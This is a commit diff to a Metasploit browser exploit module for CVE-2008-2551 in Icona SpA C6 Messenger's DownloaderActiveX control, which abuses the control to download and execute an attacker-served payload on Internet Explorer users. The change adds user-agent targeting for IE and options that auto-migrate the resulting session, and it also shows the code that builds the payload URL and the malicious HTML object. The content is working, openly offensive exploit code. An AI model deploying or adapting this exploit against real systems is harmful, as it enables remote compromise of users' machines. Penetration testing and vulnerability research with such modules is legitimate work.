Add user-agent check. Auto-migrate.

2012-02-02 03:11:10 -06:00 · 2012-02-02 03:11:10 -06:00 · 6b29af5c23
parent 6be65acfe2
commit 6b29af5c23
1 changed files with 19 additions and 6 deletions
--- a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
+++ b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
@ -17,9 +17,10 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name'           => 'Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute',
 			'Description'    => %q{
-					This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The vulnerability
-				is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The insecure control can be
-				abused to download and execute arbitrary files in the context of the currently logged-on user.
+					This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The
+				vulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The
+				insecure control can be abused to download and execute arbitrary files in the context of
+				the currently logged-on user.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
@ -27,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Nine:Situations:Group::SnoopyAssault', # Vulnerability discovery and exploit
 					'juan vazquez' # metasploit module
 				],
-			'Version'        => '$Revision: $',
 			'References'     =>
 				[
 					[ 'CVE', '2008-2551' ],
@ -35,6 +35,11 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'BID', '29519' ],
 					[ 'URL', 'http://retrogod.altervista.org/9sg_c6_download_exec.html' ],
 				],
+			'DefaultOptions' =>
+				{
+					'ExitFunction'         => "none",
+					'InitialAutoRunScript' => 'migrate -f'
+				},
 			'Payload'        =>
 				{
 					'Space'           => 2048,
@ -60,6 +65,14 @@ class Metasploit3 < Msf::Exploit::Remote

 	def on_request_uri(cli, request)

+		# Only IEs are potential targets
+		# "File Session" is used when the ActiveX tries to request the EXE
+		agent = request.headers['User-Agent']
+		if agent !~ /MSIE \d\.\d|File Session/
+			print_error("Target not supported: #{cli.peerhost}:#{cli.peerport} (#{agent})")
+			return
+		end
+
 		payload_url =  "http://"
 		payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
 		payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/#{@payload_rand}"
@ -72,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end

-		exe    = rand_text_alpha(rand(5) + 1 )
+		exe = rand_text_alpha(rand(5) + 1 )

 		content = %Q|
 		<html>
@ -91,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				<param name="propInterrupt"  value="0">
 			</OBJECT>
 		</html>
-				|
+		|

 		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")